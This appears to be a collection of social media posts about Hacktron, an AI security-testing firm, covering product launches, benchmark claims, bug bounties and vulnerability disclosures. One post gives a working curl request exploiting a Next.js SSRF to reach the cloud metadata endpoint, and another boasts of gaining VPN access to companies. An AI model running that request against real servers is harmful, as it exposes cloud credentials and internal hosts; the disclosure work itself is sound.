Really hope more people get to try Hacktron. You guys are doing great so far and I love the open source initiative

So @Doyensec recently published a report comparing @xbow and @AikidoSecurity, two AI pentest platforms. I figured, why not run @HacktronAI on the same test? So I ran a pentest on one of the target. Hacktron cost $350, while XBOW and Aikido cost $4,000 each. We did pretty well!

oh interesting! i am not aware of this. we're leading the leaderboard for most critical and weaponizable vulnerabilities, ahead of Anthropic and XBOW haha.

Who's finding what? @AnthropicAI owns critical count. @HacktronAI leads on severity exploitability. AISLE covers the most CWE types. There’s no clear overall winner.

Hacktron Review plugs into your pull requests and catches exploitable vulnerabilities other scanners walk straight past. Find real security issues within 24 hours of onboarding. Try it free → hacktron.ai

When Your VPN Opens Your Private Network to the Public! An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN. Blog - hacktron.ai/blog/cve-2026-02…

Check out our security work on Next.js. We’re also offering free security scans for open source projects. Apply here: hacktron.ai/blog/hacktron-re…

Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI CVE-2026-44578: SSRF via WebSocket upgrade. It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications. curl -H "Connection: Upgrade" -H "Upgrade: websocket" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \ "http://target:3000" \ --request-target "http://169.254.169.254/latest/meta-data/"

This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps! Unlike the buffer overflow this isn't limited to PAN OS. Will be disclosing full details later next week on @HacktronAI blog. security.paloaltonetworks.co…

RCE in Github VSCode Copilot Chat hacktron.ai/blog/rce-in-vsco…

Hacktron ❤️ Open Source TL;DR: If you maintain an open source project, we want to give you Hacktron Review for free. Because giving maintainers the same capabilities as attackers would otherwise use against them felt like the right thing to do. hacktron.ai/blog/hacktron-re…

Next.js v16.2.5 fixes a bunch of vulnerabilities reported by @HacktronAI. Patch ASAP, especially if you’re running self-hosted Next.js that SSRF might affect you CVE-2026-44574: Middleware / Proxy bypass via dynamic route parameter injection CVE-2026-44578: SSRF in applications using WebSocket upgrades CVE-2026-44581: XSS in App Router applications using CSP nonces

How tech bros be seeing their move to sf

when react2shell hit last year, i think vercel handled it brilliantly. to protect their users, they paid $50,000 for every bypass researchers could find. we decided to participate, and ended up earning $170,000. read how we did it here: hacktron.ai/blog/react2shell…

"Mohan Pedhapati (@S1r1u5_), CTO of Hacktron, described how he used Opus 4.6 to create a full exploit chain targeting the V8 JavaScript engine in Chrome 138, which is bundled into current versions of Discord." theregister.com/2026/04/17/c…

Mythos showed that frontier models can find complex vulnerabilities with a skilled operator in the loop. But for applications that don't have the complexity of a JIT compiler, we found that smaller models run repeatedly can outperform larger frontier models on cost-to-recall. hacktron.ai/blog/why-mythos-…

Introducing Hacktron Review: an AI security reviewer for your pull requests. It understands your whole codebase, builds a threat model, takes your feedback, and catches exploitable vulnerabilities before they reach production. Try for free: app.hacktron.ai

We won 2nd place at Vercel's AI Accelerator Demo Day and I've been told on very short notice that today is Vercel Day on Product Hunt and to do a launch on it. So here it is. We would love to have your support: producthunt.com/products/hac…

The exploit for CVE-2026-1731 is out. The APT of CVE-2026-1281 missed a major target 😅. Props to watchTowr for the blog on it. The moment I read it, my instinct said there had to be a variant in remote support, given how heavily it relies on bash scripts. @HacktronAI did the rest. Literally gave me PoC in hand. (Vibe hacking?) What surprised me was that I didn’t know this bash quirk earlier, even though I’d already run into a similar quirk in another language. Consider this a reminder: read the blogs. Always.